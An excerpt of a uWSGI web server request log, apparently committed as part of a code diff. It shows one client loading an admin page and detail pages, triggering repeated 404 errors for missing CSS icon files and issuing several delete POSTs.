+[pid: 18965|app: 0|req: 165/260] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 166/261] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:24 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 167/262] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:24 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/263] 117.100.100.38 () {38 vars in 1273 bytes} [Fri Jan 8 15:37:24 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/264] 117.100.100.38 () {38 vars in 1347 bytes} [Fri Jan 8 15:37:25 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 168/265] 117.100.100.38 () {42 vars in 1428 bytes} [Fri Jan 8 15:37:38 2021] GET /admin-home/ => generated 15704 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 169/266] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:38 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 170/267] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 171/268] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 172/269] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 173/270] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 174/271] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 175/272] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:39 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 176/273] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:39 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 177/274] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:39 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/275] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:39 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+delete
+[pid: 18965|app: 0|req: 178/276] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:40 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 179/277] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:41 2021] GET /admin-home/ => generated 14177 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 180/278] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 181/279] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 182/280] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 183/281] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 184/282] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 185/283] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 186/284] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:41 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 187/285] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:41 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 188/286] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:41 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 189/287] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 15:37:44 2021] GET /single/5 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 190/288] 117.100.100.38 () {40 vars in 1395 bytes} [Fri Jan 8 15:37:44 2021] GET /single/5/ => generated 8171 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 191/289] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:44 2021] GET /single/5/None => generated 8171 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 192/290] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 193/291] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:48 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+delete
+[pid: 18965|app: 0|req: 194/292] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:50 2021] POST /admin-home/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 195/293] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:50 2021] GET /admin-home/ => generated 12641 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 196/294] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 197/295] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 198/296] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 200/297] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 200/298] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 201/299] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 202/300] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 203/301] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:50 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 204/302] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:50 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+delete
+[pid: 18965|app: 0|req: 205/303] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:52 2021] POST /admin-home/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 206/304] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:52 2021] GET /admin-home/ => generated 11105 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 207/305] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 208/306] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 209/307] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 210/308] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 211/309] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 212/310] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 213/311] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:52 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 214/312] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:52 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 215/313] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:52 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+delete
+[pid: 18965|app: 0|req: 216/314] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:52 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 217/315] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:53 2021] GET /admin-home/ => generated 9569 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 218/316] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 219/317] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 220/318] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 221/319] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 222/320] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 223/321] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 224/322] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:53 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 225/323] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:53 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 226/324] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 15:37:53 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 227/325] 117.100.100.38 () {40 vars in 1395 bytes} [Fri Jan 8 15:37:54 2021] GET /single/5/ => generated 8171 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 228/326] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:54 2021] GET /single/5/None => generated 8171 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 229/327] 117.100.100.38 () {38 vars in 1288 bytes} [Fri Jan 8 15:37:56 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 230/328] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 231/329] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 232/330] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 233/331] 117.100.100.38 () {38 vars in 1396 bytes} [Fri Jan 8 15:37:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+delete
+[pid: 18965|app: 0|req: 234/332] 117.100.100.38 () {48 vars in 1497 bytes} [Fri Jan 8 15:37:57 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 235/333] 117.100.100.38 () {40 vars in 1399 bytes} [Fri Jan 8 15:37:57 2021] GET /admin-home/ => generated 8036 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 236/334] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 237/335] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 238/336] 117.100.100.38 () {38 vars in 1318 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 239/337] 117.100.100.38 () {38 vars in 1338 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 240/338] 117.100.100.38 () {38 vars in 1338 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 241/339] 117.100.100.38 () {38 vars in 1354 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 242/340] 117.100.100.38 () {38 vars in 1395 bytes} [Fri Jan 8 15:37:57 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 243/341] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:57 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 244/342] 117.100.100.38 () {38 vars in 1285 bytes} [Fri Jan 8 15:37:57 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 245/343] 117.100.100.38 () {40 vars in 1392 bytes} [Fri Jan 8 15:37:58 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 246/344] 117.100.100.38 () {40 vars in 1394 bytes} [Fri Jan 8 15:37:58 2021] GET /single/6/ => generated 8771 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/345] 117.100.100.38 () {40 vars in 1425 bytes} [Fri Jan 8 15:37:58 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/346] 117.100.100.38 () {38 vars in 1418 bytes} [Fri Jan 8 15:37:58 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 247/347] 117.100.100.38 () {38 vars in 1351 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 248/348] 117.100.100.38 () {38 vars in 1363 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 249/349] 117.100.100.38 () {38 vars in 1355 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 250/350] 117.100.100.38 () {38 vars in 1319 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 251/351] 117.100.100.38 () {38 vars in 1395 bytes} [Fri Jan 8 15:38:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 252/352] 117.100.100.38 () {38 vars in 1285 bytes} [Fri Jan 8 15:38:00 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 253/353] 117.100.100.38 () {40 vars in 1398 bytes} [Fri Jan 8 15:38:02 2021] GET /admin-home/ => generated 8036 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
